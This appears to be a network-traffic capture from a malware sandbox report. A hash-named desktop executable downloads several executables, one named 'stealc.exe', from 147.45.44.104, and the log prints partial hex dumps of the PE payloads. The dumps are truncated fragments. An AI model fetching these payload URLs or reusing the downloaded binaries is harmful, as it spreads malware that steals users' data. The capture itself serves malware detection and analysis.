Aug 10, 2024 16:12:20.780546904 CEST	983	IN	Data Raw: 79 78 54 55 70 41 46 30 48 2f 59 58 4d 67 4d 38 43 68 32 31 75 61 67 34 56 35 46 30 44 4b 57 77 67 6e 61 43 79 67 4a 50 59 36 62 78 61 67 44 57 41 58 76 39 46 5a 33 44 61 6b 66 52 41 6d 70 75 75 73 6e 6d 75 63 52 39 51 43 7a 67 73 76 64 30 54 6b Data Ascii: yxTUpAF0H/YXMgM8Ch21uag4V5F0DKWwgnaCygJPY6bxagDWAXv9FZ3DakfRAmpuusnmucR9QCzgsvd0TkS5/vd5+PPf8hfr1ot7J4fxHGZs+GvtER+0BpcqGRhlHz7sh5Avuveofqx2U6nGUhDQJlsywMk/XpHHtyOR9Ncr7MQBvuB6kDRoYuyI50q9qPp5OhHIy/QyUOnBKPgmgk4prSonv99vBSIVMi1kWd+J6IBfIviGrWC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	147.45.44.104	80	7008	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Timestamp	Bytes transferred	Direction	Data
Aug 10, 2024 16:12:20.967691898 CEST	223	OUT	HEAD /prog/66b623c3b1dcb_Mowdiewart.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Aug 10, 2024 16:12:21.617742062 CEST	309	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 10 Aug 2024 14:12:21 GMT Content-Type: application/octet-stream Content-Length: 529408 Last-Modified: Fri, 09 Aug 2024 14:12:19 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66b623c3-81400" X-Content-Type-Options: nosniff Accept-Ranges: bytes
Aug 10, 2024 16:12:21.618046045 CEST	217	OUT	HEAD /prog/66b45c742e0a1_123p.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Aug 10, 2024 16:12:21.806340933 CEST	312	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 10 Aug 2024 14:12:21 GMT Content-Type: application/octet-stream Content-Length: 10590720 Last-Modified: Thu, 08 Aug 2024 05:49:40 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66b45c74-a19a00" X-Content-Type-Options: nosniff Accept-Ranges: bytes
Aug 10, 2024 16:12:21.806632042 CEST	220	OUT	HEAD /prog/66b24859611ad_agent_3.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Aug 10, 2024 16:12:21.996238947 CEST	311	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 10 Aug 2024 14:12:21 GMT Content-Type: application/octet-stream Content-Length: 3097600 Last-Modified: Tue, 06 Aug 2024 15:59:21 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66b24859-2f4400" X-Content-Type-Options: nosniff Accept-Ranges: bytes
Aug 10, 2024 16:12:22.000056028 CEST	225	OUT	HEAD /prog/66b5b75106ac6_stealc.exe#space HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Aug 10, 2024 16:12:22.188772917 CEST	311	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 10 Aug 2024 14:12:22 GMT Content-Type: application/octet-stream Content-Length: 6332416 Last-Modified: Fri, 09 Aug 2024 06:29:37 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66b5b751-60a000" X-Content-Type-Options: nosniff Accept-Ranges: bytes
Aug 10, 2024 16:12:22.189384937 CEST	228	OUT	GET /prog/66ae9cc050ded_file0308.exe#fileotr HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Aug 10, 2024 16:12:22.382656097 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 10 Aug 2024 14:12:22 GMT Content-Type: application/octet-stream Content-Length: 746496 Last-Modified: Sat, 03 Aug 2024 21:10:24 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66ae9cc0-b6400" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0f dd a6 25 4b bc c8 76 4b bc c8 76 4b bc c8 76 f6 f3 5e 76 4a bc c8 76 55 ee 4c 76 55 bc c8 76 55 ee 5d 76 5b bc c8 76 55 ee 4b 76 2f bc c8 76 6c 7a b3 76 4e bc c8 76 4b bc c9 76 3e bc c8 76 55 ee 42 76 4a bc c8 76 55 ee 5c 76 4a bc c8 76 55 ee 59 76 4a bc c8 76 52 69 63 68 4b bc c8 76 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a6 d9 49 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6c 0a 00 00 08 02 00 00 00 00 00 75 14 00 00 00 10 00 00 00 80 0a 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 a0 0c 00 00 04 00 00 b2 5f 0c 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$%KvKvKv^vJvULvUvU]v[vUKv/vlzvNvKv>vUBvJvU\vJvUYvJvRichKvPELIelu@_<@.text7kl `.rdata4"$p@@.data(#@.rsrc@@
Aug 10, 2024 16:12:22.382977009 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: %(J;JujU S39]u#SSSSSNE;tVuEuEuEPEEBMxEEPSYY^[
Aug 10, 2024 16:12:22.382989883 CEST	1236	IN	Data Raw: 00 c3 e8 cf 3b 00 00 e9 79 fe ff ff 8b ff 55 8b ec 81 ec 28 03 00 00 a3 d8 c8 4a 00 89 0d d4 c8 4a 00 89 15 d0 c8 4a 00 89 1d cc c8 4a 00 89 35 c8 c8 4a 00 89 3d c4 c8 4a 00 66 8c 15 f0 c8 4a 00 66 8c 0d e4 c8 4a 00 66 8c 1d c0 c8 4a 00 66 8c 05 Data Ascii: ;yU(JJJJ5J=JfJfJfJfJf%Jf-JJEJEJEJ(JJJJJJJJ Jj;YjJhJJ= J
Aug 10, 2024 16:12:22.383913994 CEST	1236	IN	Data Raw: 83 bd d8 fd ff ff 00 89 9d c4 fd ff ff 0f 8c 0b 0a 00 00 8a c2 2c 20 3c 58 77 11 0f be c2 0f be 80 d8 81 4a 00 83 e0 0f 33 f6 eb 04 33 f6 33 c0 0f be 84 c1 f8 81 4a 00 6a 07 c1 f8 04 59 89 85 94 fd ff ff 3b c1 0f 87 ad 09 00 00 ff 24 85 8e 23 40 Data Ascii: , <XwJ333JjY;$#@v tJt6t%HHtWK?3$*u,;
Aug 10, 2024 16:12:22.383928061 CEST	1236	IN	Data Raw: f6 85 f0 fd ff ff 80 c7 85 e0 fd ff ff 08 00 00 00 74 61 81 8d f0 fd ff ff 00 02 00 00 eb 55 8b 37 83 c7 04 89 bd dc fd ff ff e8 6f f4 ff ff 85 c0 0f 84 2f fa ff ff f6 85 f0 fd ff ff 20 74 0c 66 8b 85 d8 fd ff ff 66 89 06 eb 08 8b 85 d8 fd ff ff Data Ascii: taU7o/ tff@WugueY9~~?]VFYt
Aug 10, 2024 16:12:22.385138988 CEST	1236	IN	Data Raw: e4 fd ff ff 50 8d 85 d8 fd ff ff e8 ca f4 ff ff 59 83 bd d8 fd ff ff 00 7c 1b f6 85 f0 fd ff ff 04 74 12 57 53 6a 20 8d 85 d8 fd ff ff e8 82 f4 ff ff 83 c4 0c 83 bd bc fd ff ff 00 74 13 ff b5 bc fd ff ff e8 75 ed ff ff 83 a5 bc fd ff ff 00 59 8b Data Ascii: PY\|tWSj tuYtt`pM_^3[{@@@(@t@@@@UEJ]U(J3ESjL
Aug 10, 2024 16:12:22.385154009 CEST	776	IN	Data Raw: 8b cf 69 c9 04 02 00 00 8d 8c 01 44 01 00 00 89 4d f0 8b 0e 49 89 4d fc f6 c1 01 0f 85 d3 02 00 00 53 8d 1c 31 8b 13 89 55 f4 8b 56 fc 89 55 f8 8b 55 f4 89 5d 0c f6 c2 01 75 74 c1 fa 04 4a 83 fa 3f 76 03 6a 3f 5a 8b 4b 04 3b 4b 08 75 42 bb 00 00 Data Ascii: iDMIMS1UVUU]utJ?vj?ZK;KuB sL!\Du#M!JL!uM!Y]S[MMZUZRSMJ?vj?Z]]+u]j?uK^;vMJM;v
Aug 10, 2024 16:12:22.385942936 CEST	1236	IN	Data Raw: f0 75 34 83 c0 10 6b c0 14 50 ff 35 0c c3 4b 00 57 ff 35 f8 ca 4a 00 ff 15 d0 80 4a 00 3b c7 75 04 33 c0 eb 78 83 05 18 c3 4b 00 10 8b 35 08 c3 4b 00 a3 0c c3 4b 00 6b f6 14 03 35 0c c3 4b 00 68 c4 41 00 00 6a 08 ff 35 f8 ca 4a 00 ff 15 c8 80 4a Data Ascii: u4kP5KW5JJ;u3xK5KKk5KhAj5JJF;tjh hWJF;uvW5JJN>~KF_^UQQMASVqW3C}i0Dj?EZ@@Jujhyh
Aug 10, 2024 16:12:22.385955095 CEST	224	IN	Data Raw: 00 8b d9 eb 11 8b 53 04 8b 3b 23 55 f8 23 fe 0b d7 75 0a 83 c3 14 89 5d 08 3b d8 72 e8 3b d8 75 7f 8b 1d 0c c3 4b 00 eb 11 8b 53 04 8b 3b 23 55 f8 23 fe 0b d7 75 0a 83 c3 14 89 5d 08 3b d9 72 e8 3b d9 75 5b eb 0c 83 7b 08 00 75 0a 83 c3 14 89 5d Data Ascii: S;#U#u];r;uKS;#U#u];r;u[{u];r;u1K{u];r;u]u3S:YKC8tKCUt\|D#M#u)eHD9#U#u
Aug 10, 2024 16:12:22.387191057 CEST	1236	IN	Data Raw: 45 fc 8b 91 84 00 00 00 83 c1 04 eb e7 8b 55 fc 8b ca 69 c9 04 02 00 00 8d 8c 01 44 01 00 00 89 4d f4 8b 4c 90 44 33 ff 23 ce 75 12 8b 8c 90 c4 00 00 00 23 4d f8 6a 20 5f eb 03 03 c9 47 85 c9 7d f9 8b 4d f4 8b 54 f9 04 8b 0a 2b 4d f0 8b f1 c1 fe Data Ascii: EUiDMLD3#u#Mj _G}MT+MN?M~j?^;J;Ju\ }&M\|8]#\D\Du3M]!,OM\|8!]u]M!K]}JzyJzyMyJ
Aug 10, 2024 16:12:22.387204885 CEST	1236	IN	Data Raw: 00 e8 67 3b 00 00 a1 04 b0 4a 00 33 c5 89 45 fc 53 56 8b 75 08 57 56 e8 d2 25 00 00 8b d8 33 c0 39 46 04 59 89 9d e8 ef ff ff 7d 03 89 46 04 6a 01 50 50 53 e8 e0 1b 00 00 83 c4 10 8b f8 89 bd ec ef ff ff 89 95 f0 ef ff ff 85 d2 7f 10 7c 04 85 ff Data Ascii: g;J3ESVuWV%39FY}FjPPS\|sKH$FuF+V+VZ39P09Vu
Aug 10, 2024 16:12:23.117507935 CEST	222	OUT	GET /prog/66b5ac1092454_otraba.exe#otr HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Aug 10, 2024 16:12:23.322597027 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 10 Aug 2024 14:12:23 GMT Content-Type: application/octet-stream Content-Length: 6753792 Last-Modified: Fri, 09 Aug 2024 05:41:36 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66b5ac10-670e00" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 fa a0 b5 66 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 70 64 00 00 9a 02 00 00 00 00 00 ae 8f 64 00 00 20 00 00 00 a0 64 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 67 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 60 8f 64 00 4b 00 00 00 00 c0 64 00 a8 93 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 67 00 0c 00 00 00 19 8f 64 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELfpdd d@ g@`dKd`gd H.textod pd `.sdatadtd@.rsrcdxd@@.reloc`gg@B
Aug 10, 2024 16:12:27.882268906 CEST	219	OUT	GET /prog/66b24859611ad_agent_3.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Aug 10, 2024 16:12:28.071682930 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 10 Aug 2024 14:12:27 GMT Content-Type: application/octet-stream Content-Length: 3097600 Last-Modified: Tue, 06 Aug 2024 15:59:21 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66b24859-2f4400" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 0c 00 00 00 00 00 00 fc 2b 00 83 13 00 00 e0 00 03 03 0b 01 03 00 00 be 1b 00 00 36 01 00 00 00 00 00 40 b2 04 00 00 10 00 00 00 d0 1b 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 f0 30 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 2d 00 72 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL+6@@0-r.text-``.dataj6@/4@B/18PB/300 B/43!T B/59$2"42!B/757#f"B/94Q,#.h"B/106a -b+B.idatar-+@.symtabF-H+B
Aug 10, 2024 16:12:30.157716036 CEST	226	OUT	GET /prog/66b5d9d3adbaa_defaultr.exe#space HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Aug 10, 2024 16:12:30.348376989 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 10 Aug 2024 14:12:30 GMT Content-Type: application/octet-stream Content-Length: 11649536 Last-Modified: Fri, 09 Aug 2024 08:56:51 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66b5d9d3-b1c200" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 6c c5 b5 66 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 88 af 00 00 36 02 00 00 00 00 00 ce a6 af 00 00 20 00 00 00 c0 af 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 b2 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 a6 af 00 4b 00 00 00 00 e0 af 00 f4 2e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 b2 00 0c 00 00 00 3c a6 af 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELlf6 @ @@K. < H.text `.sdata@.rsrc.0@@.reloc @B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	147.45.44.104	80	7008	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Timestamp	Bytes transferred	Direction	Data
Aug 10, 2024 16:12:20.967845917 CEST	229	OUT	HEAD /prog/66ae9cc050ded_file0308.exe#fileotr HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Aug 10, 2024 16:12:21.621125937 CEST	309	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 10 Aug 2024 14:12:21 GMT Content-Type: application/octet-stream Content-Length: 746496 Last-Modified: Sat, 03 Aug 2024 21:10:24 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66ae9cc0-b6400" X-Content-Type-Options: nosniff Accept-Ranges: bytes
Aug 10, 2024 16:12:21.621301889 CEST	223	OUT	HEAD /prog/66b5ac1092454_otraba.exe#otr HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Aug 10, 2024 16:12:21.811333895 CEST	311	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 10 Aug 2024 14:12:21 GMT Content-Type: application/octet-stream Content-Length: 6753792 Last-Modified: Fri, 09 Aug 2024 05:41:36 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66b5ac10-670e00" X-Content-Type-Options: nosniff Accept-Ranges: bytes
Aug 10, 2024 16:12:21.811542988 CEST	227	OUT	HEAD /prog/66b5d9d3adbaa_defaultr.exe#space HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Aug 10, 2024 16:12:22.004254103 CEST	312	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 10 Aug 2024 14:12:21 GMT Content-Type: application/octet-stream Content-Length: 11649536 Last-Modified: Fri, 09 Aug 2024 08:56:51 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66b5d9d3-b1c200" X-Content-Type-Options: nosniff Accept-Ranges: bytes
Aug 10, 2024 16:12:22.004599094 CEST	222	OUT	GET /prog/66b623c3b1dcb_Mowdiewart.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Aug 10, 2024 16:12:22.198196888 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 10 Aug 2024 14:12:22 GMT Content-Type: application/octet-stream Content-Length: 529408 Last-Modified: Fri, 09 Aug 2024 14:12:19 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66b623c3-81400" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 35 f1 4b b6 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 08 08 00 00 08 00 00 00 00 00 00 9a 67 03 00 00 20 00 00 00 40 08 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 08 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 48 67 03 00 4f 00 00 00 00 40 08 00 a0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 08 00 0c 00 00 00 2c 67 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL5K0g @@ @HgO@`,g H.text `.rsrc@@@.reloc`@B
Aug 10, 2024 16:12:22.198739052 CEST	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: \|gHHtf{:}({*20}
Aug 10, 2024 16:12:22.198750019 CEST	1236	IN	Data Raw: 04 2b 0b 72 01 00 00 70 73 1c 00 00 0a 7a 02 28 1b 00 00 0a 2a 1e 02 7b 0c 00 00 04 2a 1e 02 7b 0d 00 00 04 2a 7e d0 19 00 00 01 28 1d 00 00 0a 03 8c 19 00 00 01 28 1e 00 00 0a 2c 07 02 03 7d 0d 00 00 04 2a 22 02 03 7d 0c 00 00 04 2a 52 02 28 1f Data Ascii: +rpsz({{~((,}"}R(,~ o!0s",M(#($"@Z"@Z(%"4C"Bo&(#X($('+(#($(',((Y($(
Aug 10, 2024 16:12:22.200021982 CEST	1236	IN	Data Raw: 02 00 00 06 26 03 7e 4c 00 00 0a 28 4d 00 00 0a 2a 02 03 28 4e 00 00 0a 2a 13 30 03 00 7b 00 00 00 00 00 00 00 02 7b 04 00 00 04 2c 3a 02 7b 02 00 00 04 20 f2 00 00 00 2f 0f 02 02 7b 02 00 00 04 1f 0f 58 7d 02 00 00 04 02 7b 03 00 00 04 20 a0 00 Data Ascii: &~L(M(N0{{,:{ /{X}{ /C{X}+2{2{Y}{2{Y}(*0oOoPoQoR(S(Tk"@Y(S(UYk
Aug 10, 2024 16:12:22.200036049 CEST	1236	IN	Data Raw: 00 0a 02 17 6f 3d 00 00 0a 02 1b 6f 72 00 00 0a 02 16 1f 1f 16 16 73 73 00 00 0a 28 74 00 00 0a 02 1f 64 1f 2a 73 41 00 00 0a 6f 43 00 00 0a 02 72 89 00 00 70 22 00 00 10 41 73 3e 00 00 0a 6f 3f 00 00 0a 02 28 75 00 00 0a 6f 76 00 00 0a 02 1f 1c Data Ascii: o=orss(tdsAoCrp"As>o?(uov}0[(w(xoy(x(zo{(x(\|o<(x(xo}(~o(o*0woO(orp(8sX
Aug 10, 2024 16:12:22.202337980 CEST	1236	IN	Data Raw: 2c 00 00 0a 02 28 85 00 00 0a 0a 02 7b 1d 00 00 04 2c 36 02 7b 1b 00 00 04 03 6f 66 00 00 0a 20 00 00 10 00 fe 01 5f 2c 20 06 6f 88 00 00 0a 0b 07 2c 06 07 18 2e 0b 2b 10 06 18 6f 89 00 00 0a 2b 07 06 16 6f 89 00 00 0a 02 7b 1e 00 00 04 2c 1d 02 Data Ascii: ,({,6{of _, o,.+o+o{,{of _,o{of _,(i}(9 (:(;o<o=o(uov((o4 Ys(o*0
Aug 10, 2024 16:12:22.202353001 CEST	896	IN	Data Raw: 0b 02 7e 2e 00 00 04 28 a0 00 00 0a 2a 3e 02 03 28 a1 00 00 0a 02 14 28 a0 00 00 0a 2a 82 02 03 28 a2 00 00 0a 02 02 7b 2c 00 00 04 28 98 00 00 0a 02 02 7b 2c 00 00 04 28 99 00 00 0a 2a 6a 7e 4c 00 00 0a 20 89 7f 00 00 28 01 00 00 06 73 a3 00 00 Data Ascii: ~.(>((({,({,(j~L (s.0G(9 (: 6 sA(BdsAoCrIp(8o<0oO(4(5Y(6oPrYp(8"@sZ
Aug 10, 2024 16:12:22.204844952 CEST	1236	IN	Data Raw: 00 04 2a 3a 02 03 7d 3f 00 00 04 02 28 1b 00 00 0a 2a 22 02 04 6f 21 00 00 0a 2a 00 00 13 30 02 00 4f 00 00 00 00 00 00 00 02 7b 33 00 00 04 2c 15 02 72 79 00 00 70 28 38 00 00 0a 73 ae 00 00 0a 7d 30 00 00 04 02 02 7b 3f 00 00 04 73 58 00 00 0a Data Ascii: :}?("o!0O{3,ryp(8s}0{?sX}2{/o0(((0Q{3,ryp(8s}0{?sX}2{/o0(+((*0Po,o
Aug 10, 2024 16:12:22.204859018 CEST	1236	IN	Data Raw: c6 00 00 0a 6f ca 00 00 0a 02 7b 2f 00 00 04 02 fe 06 79 00 00 06 73 49 00 00 0a 6f cb 00 00 0a 02 7b 2f 00 00 04 02 fe 06 7a 00 00 06 73 49 00 00 0a 6f cc 00 00 0a 02 7b 2f 00 00 04 02 fe 06 7b 00 00 06 73 49 00 00 0a 6f cd 00 00 0a 2a 00 00 13 Data Ascii: o{/ysIo{/zsIo{/{sIo0r{1-{/o1s}1{1so{1o{1sIo{/o{1o{1-{/o{1o}1
Aug 10, 2024 16:12:22.207307100 CEST	1236	IN	Data Raw: 11 73 ee 00 00 0a 0a 06 04 7d ef 00 00 0a 06 03 7d f0 00 00 0a 06 fe 06 f1 00 00 0a 73 f2 00 00 0a 73 f3 00 00 0a 0b 02 06 7b f0 00 00 0a 07 73 e1 00 00 0a 14 6f e2 00 00 0a 74 09 00 00 1b 25 2d 02 26 07 6f f4 00 00 0a 2a 00 00 00 13 30 05 00 46 Data Ascii: s}}ss{sot%-&o0Fs}}ss{ot%-&o0Fs}}ss{ot%-&o*
Aug 10, 2024 16:12:22.207319975 CEST	1236	IN	Data Raw: 03 6f 07 01 00 0a 28 09 01 00 0a 0b 07 17 73 ff 00 00 0a 0c 06 08 6f 0a 01 00 0a de 1e 08 2c 06 08 6f 60 00 00 0a dc 07 2c 06 07 6f 60 00 00 0a dc 06 2c 06 06 6f 60 00 00 0a dc 2a 00 01 28 00 00 02 00 1b 00 09 24 00 0a 00 00 00 00 02 00 13 00 1b Data Ascii: o(so,o`,o`,o`($.180J(ossiooo,o`,o`4,>0Fos
